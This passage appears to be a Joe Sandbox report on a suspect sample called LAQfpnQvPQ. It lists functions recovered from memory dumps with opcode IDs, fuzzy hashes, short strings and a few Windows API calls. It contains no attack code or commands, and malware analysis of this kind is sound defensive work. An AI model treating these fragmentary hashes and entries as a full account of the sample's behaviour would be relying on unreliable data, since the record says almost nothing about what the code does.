                                                                          • Opcode ID: a60ee4e2b40892782ebac94c7613a8a48f6b4bcb0e196b4b10dfdf3965f48cc8
                                                                          • Instruction ID: 70d1835080c23fc6bf8a1a0edc649a1eb7ddfd1a84ffd2b2d6905c28de0e6a6d
                                                                          • Opcode Fuzzy Hash: a60ee4e2b40892782ebac94c7613a8a48f6b4bcb0e196b4b10dfdf3965f48cc8
                                                                          • Instruction Fuzzy Hash: 98115BB5804388CFDB10DF9AD5047EABFF4AB1A314F144099D598A7242C3796644CBA6
                                                                          Function 017EA518 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 017EA57E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2219026524.00000000017E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017E0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_17e0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 4f899c7a4cf261e4822814282d7cbe0722a5b524199ac86b3f8494487a9455e1
                                                                          • Instruction ID: a09491a87f4ea8ec9f7d0fe8960c21e1c535b193014e560c78a3da7781376413
                                                                          • Opcode Fuzzy Hash: 4f899c7a4cf261e4822814282d7cbe0722a5b524199ac86b3f8494487a9455e1
                                                                          • Instruction Fuzzy Hash: B311DFB6C003498FDB10DF9AC448A9EFBF5EB88614F20842AD569A7210D379A545CFA5
                                                                          Function 07753950 Relevance: 1.5, Strings: 1, Instructions: 244COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Pl]q
                                                                          • API String ID: 0-2207481929
                                                                          • Opcode ID: 5be68b3c7cf49723fd6f06a4bf119ab4733888c4de5eb05830d18abca60fb8dc
                                                                          • Instruction ID: 1733e6111a55e4e7654fcd861763b13d17a15887f899d02d3f61750fb75f04c1
                                                                          • Opcode Fuzzy Hash: 5be68b3c7cf49723fd6f06a4bf119ab4733888c4de5eb05830d18abca60fb8dc
                                                                          • Instruction Fuzzy Hash: D89147B0B001058FDB04DF29C884AAA7BF6BF89794F1544A9E805CB3B4DBB5ED41CB91
                                                                          Function 07757D90 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: e6917f1d289c82c468c8ee02b7c6c1efd94836e0b3c7a0410f0e171c5d4cb592
                                                                          • Instruction ID: f3162e25680b6f91f1d96dc2578ed680b84f20e514e5f9f53e966104cf757bbf
                                                                          • Opcode Fuzzy Hash: e6917f1d289c82c468c8ee02b7c6c1efd94836e0b3c7a0410f0e171c5d4cb592
                                                                          • Instruction Fuzzy Hash: AFA1ED74A10219DFCB08DFA4D89899DB7B2FF89310F158559E806AB365DB70EC42CF91
                                                                          Function 0775EC88 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: 4bac3adc35d448b9ce5805cd45ebf381005209aca760e6e5dbb4959d508a5b50
                                                                          • Instruction ID: e0c76f0f941b62791f0715b1aff29a3d063ee4d27cd93549b4cbc304045e6a0b
                                                                          • Opcode Fuzzy Hash: 4bac3adc35d448b9ce5805cd45ebf381005209aca760e6e5dbb4959d508a5b50
                                                                          • Instruction Fuzzy Hash: B7716D74B00614CFDB08EF64C498AADB7B2EF89740F108569D9069B3A4DFB4ED46CB91
                                                                          Function 07ABFE18 Relevance: 1.4, Strings: 1, Instructions: 166COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,aq
                                                                          • API String ID: 0-3092978723
                                                                          • Opcode ID: 1cc6cd25b9a161ba050cc2a12bdd17b990e506de125db3579a3af0cd90b8a723
                                                                          • Instruction ID: 22482f7a4079eb679514c8aa91abcf7d5e52707af64d94cc715ca0b549e26982
                                                                          • Opcode Fuzzy Hash: 1cc6cd25b9a161ba050cc2a12bdd17b990e506de125db3579a3af0cd90b8a723
                                                                          • Instruction Fuzzy Hash: C851B0767001158FCB14DF69D8949AEBBF6FF8A350B25806AE905CB366DB31EC01CB91
                                                                          Function 0762E498 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: paq
                                                                          • API String ID: 0-3273118895
                                                                          • Opcode ID: 9643de4a0b48c81fbbd8d2960a59aca0361ac1490dcd2c8207a2169af437313c
                                                                          • Instruction ID: 6911edb8f5b0c45b15e9afadd8e7e12dac61b281df7812347717bbaba6933e80
                                                                          • Opcode Fuzzy Hash: 9643de4a0b48c81fbbd8d2960a59aca0361ac1490dcd2c8207a2169af437313c
                                                                          • Instruction Fuzzy Hash: 28517D76640100AFCB459FA9C944D69BBF7FF8D3107198098E2098B376DA36DC22EB91
                                                                          Function 0775A170 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: e4f67e759aeed2af300cf5797b0abc4cf391142b1ca9de0b8a65f6b643f012e1
                                                                          • Instruction ID: 18471b3c0c02882f4b7d415d71c68c4d393ac87ca664780fc46e753934880c65
                                                                          • Opcode Fuzzy Hash: e4f67e759aeed2af300cf5797b0abc4cf391142b1ca9de0b8a65f6b643f012e1
                                                                          • Instruction Fuzzy Hash: 5451F5B03042568FC7459F39C854A6E3FE6BFC9650B1A8479E806CB3A2CE75DD02C7A1
                                                                          Function 0775CE98 Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: 8a7356701902f8e5cca519c15042d70cfcc50ac7b210f6215f6ada2642872e99
                                                                          • Instruction ID: 6d8cb610031571b820665e170d2ffebeb3687a18dccefd56345af5403f31bd10
                                                                          • Opcode Fuzzy Hash: 8a7356701902f8e5cca519c15042d70cfcc50ac7b210f6215f6ada2642872e99
                                                                          • Instruction Fuzzy Hash: B951A372704245AFCB068F69D814D597FB6FF89310B1980EAE509CF2B2CA35DC11DB51
                                                                          Function 07754470 Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: 5a80cac5b89a31d871478b1a35663f74b191f15ae998e686a63fd585f1dc473a
                                                                          • Instruction ID: b01a381384dfc6497da8e377d09a3a56b65215f494297195971f897d71e1069a
                                                                          • Opcode Fuzzy Hash: 5a80cac5b89a31d871478b1a35663f74b191f15ae998e686a63fd585f1dc473a
                                                                          • Instruction Fuzzy Hash: 9E4144733046A24FC314CB79D8409AE7BF6EFC566171984BAE845CB792CA35DC01C7A0
                                                                          Function 0775BA39 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 63c89e3a7125748ea849d0b6b9bbb59db26166f03b2fefc8fdbc245395dc71e1
                                                                          • Instruction ID: 7243026cc376d01c1125e927a928938c4158e48244fa83d9443e71fd924f3f0e
                                                                          • Opcode Fuzzy Hash: 63c89e3a7125748ea849d0b6b9bbb59db26166f03b2fefc8fdbc245395dc71e1
                                                                          • Instruction Fuzzy Hash: 5B4184B4B106148FCB19AB64C458A7EB7B6AFC9750F10452DD8079B3A4DFB49C06CBD2
                                                                          Function 0762F4AB Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: 293475cd334f44802a901ef914fc3600361f15be013b49c4d1829830fe916d05
                                                                          • Instruction ID: b7b554fd41aa1c48c831c8409684c77e07ab08ad5d207ee7af4e392cec32c843
                                                                          • Opcode Fuzzy Hash: 293475cd334f44802a901ef914fc3600361f15be013b49c4d1829830fe916d05
                                                                          • Instruction Fuzzy Hash: 0C4191B5A009268FCB10CF68C484AAAFBB5FF49320F158599D526AB395D730F952CFD0
                                                                          Function 0775B440 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 0fba913208aecc73607d40db9baf5a371d898956e1005099480ee9cfea05eed4
                                                                          • Instruction ID: 0aea7683896b3c0122fdb16f2f576137c41634e731df926dbc8c597896f1da8f
                                                                          • Opcode Fuzzy Hash: 0fba913208aecc73607d40db9baf5a371d898956e1005099480ee9cfea05eed4
                                                                          • Instruction Fuzzy Hash: DA41C2B13402009FD318DB28C968F6B7BEAAFC8704F104569E50ACB3A5CE75EC02C7A1
                                                                          Function 0775B450 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: df53b3ed220a71010e2f37f131b0e6704d344242a3fb6a3b375f5847d63825f4
                                                                          • Instruction ID: b4e3ec70a783fc890103fcede394cb7d1bbbe1516e91c919c802a49ed321aaf4
                                                                          • Opcode Fuzzy Hash: df53b3ed220a71010e2f37f131b0e6704d344242a3fb6a3b375f5847d63825f4
                                                                          • Instruction Fuzzy Hash: 06313EB13406149FD318DB69C958F2B77EAAFCCB44F104568E60A8B3A5DE75EC02C791
                                                                          Function 0762ED48 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (aq
                                                                          • API String ID: 0-600464949
                                                                          • Opcode ID: cd52735e999fbb5e4a502988658fb79a0c80ba9ace50e3f96e00db948ce9e4b1
                                                                          • Instruction ID: ebabd7f9a86318293e0aba59b902521d3aaea5a16e8f5c748bf93301455c78a2
                                                                          • Opcode Fuzzy Hash: cd52735e999fbb5e4a502988658fb79a0c80ba9ace50e3f96e00db948ce9e4b1
                                                                          • Instruction Fuzzy Hash: 2621F8763001166FD7045F69D8549AEBFA6EFC9320B64403AE90ACB365DE729C16C7A0
                                                                          Function 07757213 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: f2c73573ed7b40d25d2e43a4b55ae9836af98d6606f3d6e480acf27255eb4f6f
                                                                          • Instruction ID: 5a963710a34c4215a335bcfbeb15338175ea4eabf7e686c1a6a9e1398a5fcdc1
                                                                          • Opcode Fuzzy Hash: f2c73573ed7b40d25d2e43a4b55ae9836af98d6606f3d6e480acf27255eb4f6f
                                                                          • Instruction Fuzzy Hash: 3831B4B5B002409FCF098F94D958D9DBBBAFF89350B194469E906AB361CA71EC02CB91
                                                                          Function 0762BF78 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          • Opcode ID: 53751e70bd561a12402dc24d7e7f2823067de4d3852b500d53b081871f035c05
                                                                          • Instruction ID: 4591fd2d93fbc942f09045c91620c6f6070136013ab6273f8db4eaeb34a80a2b
                                                                          • Opcode Fuzzy Hash: 53751e70bd561a12402dc24d7e7f2823067de4d3852b500d53b081871f035c05
                                                                          • Instruction Fuzzy Hash: 5D4117B4D04609CFDB44DFAAC4406AEBBF1EB89300F54C06AD40AA7355D7389946CF61
                                                                          Function 0762BF88 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: kRA
                                                                          • API String ID: 0-3334018834
                                                                          • Opcode ID: 286b0b347237210b0ce52a465e48205a17215b384f81b17183fee298ae9b7217
                                                                          • Instruction ID: 1da88d4a591369ca849af38f1bb67453d50a2dc763c1319fe43dcfee68fa8ddb
                                                                          • Opcode Fuzzy Hash: 286b0b347237210b0ce52a465e48205a17215b384f81b17183fee298ae9b7217
                                                                          • Instruction Fuzzy Hash: 643107B4E04609CBDB44DFAAC4406AEBBF6FB89300F54C069D81AA7354D7389942CF61
                                                                          Function 075F1E8D Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244585264.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75f0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 4']q
                                                                          • API String ID: 0-1259897404
                                                                          • Opcode ID: 94b1b0d4136034ed5f5b05700b429ea26bb1043ae32be55903f5fc17d3137bcd
                                                                          • Instruction ID: 41e7c40d7f4d95de4dc119b41684b1797cc634a4f8567c01a55e1439b2b76554
                                                                          • Opcode Fuzzy Hash: 94b1b0d4136034ed5f5b05700b429ea26bb1043ae32be55903f5fc17d3137bcd
                                                                          • Instruction Fuzzy Hash: AE3158B4D04249DFDB15CFA9D4046FEBBB1FF86311F1084AAD215A7251CB381A45CFA1
                                                                          Function 07752530 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p<]q
                                                                          • API String ID: 0-1327301063
                                                                          • Opcode ID: 679fea5671a1671a3b3a3a31dd339d3c1ec427fe05348173cb90ac7f37a81f2e
                                                                          • Instruction ID: 5aaccb8ac3e75e08495a8e37bbf02b17a00318a067253fec88a712f6e30a67ed
                                                                          • Opcode Fuzzy Hash: 679fea5671a1671a3b3a3a31dd339d3c1ec427fe05348173cb90ac7f37a81f2e
                                                                          • Instruction Fuzzy Hash: 1F219DB1340245AFCB01CF29C860AAA7BE9BF8A390F044096FC45CB271CA74DC40CB60
                                                                          Function 07752540 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: p<]q
                                                                          • API String ID: 0-1327301063
                                                                          • Opcode ID: 9ff3bf6ef0b5c32cffd0238cec831ff05c0cb2dd7f62ba6e06150cf9515853a3
                                                                          • Instruction ID: 63704656488706a7a8955043dfcde93a4c8f2dcef6a4351a3071caa2ed38fecd
                                                                          • Opcode Fuzzy Hash: 9ff3bf6ef0b5c32cffd0238cec831ff05c0cb2dd7f62ba6e06150cf9515853a3
                                                                          • Instruction Fuzzy Hash: 81213AF0340155AFCB05DF2AC864AAA7BEABF89381F094495FC55CB271CA75DC50CB60
                                                                          Function 075D0F90 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 075D1003
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: 4efb6a3a75d8727d2fd3a7113c061c9bc557c9e26ba0db0d278bd92c7c544e85
                                                                          • Instruction ID: 66a6b4894f7433b159e1fdfec704a709a53cda3105697e0331aa8ff458aa01e7
                                                                          • Opcode Fuzzy Hash: 4efb6a3a75d8727d2fd3a7113c061c9bc557c9e26ba0db0d278bd92c7c544e85
                                                                          • Instruction Fuzzy Hash: F0112C758002499FCB20DFAAD445ADFBBF5EF48310F208819D519A7250C7759580CBA1
                                                                          Function 075D0F98 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,?,?,?), ref: 075D1003
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244533453.00000000075D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075D0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_75d0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          • Opcode ID: c6aa05326e12f6f890e357857721c0610fc4d12437e587422ae3b484eb2f094b
                                                                          • Instruction ID: 5f993d58588ac7b470150012eb7a3836048950976612d86f06fffaa8e6f7696f
                                                                          • Opcode Fuzzy Hash: c6aa05326e12f6f890e357857721c0610fc4d12437e587422ae3b484eb2f094b
                                                                          • Instruction Fuzzy Hash: E51107B59002499FCB20DFAAC845AEEFBF5FF48314F248819D559A7250CB79A944CBA0
                                                                          Function 0762559E Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 6
                                                                          • API String ID: 0-498629140
                                                                          • Opcode ID: 4b494b09b0e28a6435947a411b2ee536612b4528579961143300c696ac973258
                                                                          • Instruction ID: fd2d5e447d7728649da2c069d807785c6c2f884c7b40c7290a55e3004accc917
                                                                          • Opcode Fuzzy Hash: 4b494b09b0e28a6435947a411b2ee536612b4528579961143300c696ac973258
                                                                          • Instruction Fuzzy Hash: C211D7B4901629DFDBA4DF24CD54A9ABBF1BF49202F1051DAC40EA7290DB305E85CF00
                                                                          Function 07AA5380 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          • API String ID: 0-2567322570
                                                                          • Opcode ID: b56a2a35a7792914dbab5878790d40e5062a44d2c2cfa840b3815d2dec52250b
                                                                          • Instruction ID: d4b7196ad213eee85f8ad3fb291da79b65574b1f0591e9d9ce5f8e1a927d1728
                                                                          • Opcode Fuzzy Hash: b56a2a35a7792914dbab5878790d40e5062a44d2c2cfa840b3815d2dec52250b
                                                                          • Instruction Fuzzy Hash: 1211A2B4900129CFDB65DF58D984AE9B7F1EB59700F0480E9D419A3644DB399E849F50
                                                                          Function 0762517C Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: %
                                                                          • API String ID: 0-2567322570
                                                                          • Opcode ID: 2564e2300ce79e50bdbb9f1b5354ad82617cf990e2755e73d61ee7868870bd33
                                                                          • Instruction ID: 49ecf5b45551b762f3f31e11a2ba9e956e0157fc28d7bd44ccd2858f08c041e5
                                                                          • Opcode Fuzzy Hash: 2564e2300ce79e50bdbb9f1b5354ad82617cf990e2755e73d61ee7868870bd33
                                                                          • Instruction Fuzzy Hash: DF1192B0904AE8CFDBA4DF64EC9879EBBB1BB45306F0051D9D40AA2640DB785EC9DF05
                                                                          Function 07AA81F6 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 76c06f1d3732fa8ed89a939750ea0bed7f85f040eff6d4651071ba8e66817745
                                                                          • Instruction ID: bb8f9ec2e9f98be693b1c6a740046bec49f88fee7204bcbf9e5edfe611221808
                                                                          • Opcode Fuzzy Hash: 76c06f1d3732fa8ed89a939750ea0bed7f85f040eff6d4651071ba8e66817745
                                                                          • Instruction Fuzzy Hash: 21F058706091858FC324AF64D9AC6ED7BB1EF96301F0081EDD10AAB6A2DBB95D85CF01
                                                                          Function 07AA7D07 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2246049585.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7aa0000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: A
                                                                          • API String ID: 0-3554254475
                                                                          • Opcode ID: 0895e48b341c5236828f8dbc541975246d319b1e1a3e85bb93c8900905225b45
                                                                          • Instruction ID: f83506806d7bc5a2845876e6402831466064eb3dd93ddec34149fda38352c2f7
                                                                          • Opcode Fuzzy Hash: 0895e48b341c5236828f8dbc541975246d319b1e1a3e85bb93c8900905225b45
                                                                          • Instruction Fuzzy Hash: 23E06DB06090198FC368AF64C9946ED7771EBDA711F40429DC52FA76D1DB780E848F10
                                                                          Function 0762B5BD Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2244697649.0000000007620000.00000040.00000800.00020000.00000000.sdmp, Offset: 07620000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7620000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Te]q
                                                                          • API String ID: 0-52440209
                                                                          • Opcode ID: bc5f202c8ee75770f5119fdff96030be608febccee1ed8257c82c94188ed0e4b
                                                                          • Instruction ID: 452799030ec6b99ab9cdd8ea085f5d0fd629c95bff8244a8398e67b9ecaa74ce
                                                                          • Opcode Fuzzy Hash: bc5f202c8ee75770f5119fdff96030be608febccee1ed8257c82c94188ed0e4b
                                                                          • Instruction Fuzzy Hash: 06F07478A01628CBCBA4DF98C99479DBBB1FB98310F50519A9409B7344DA345E85DF21
                                                                          Function 0775C088 Relevance: .4, Instructions: 437COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2245020385.0000000007750000.00000040.00000800.00020000.00000000.sdmp, Offset: 07750000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7750000_LAQfpnQvPQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
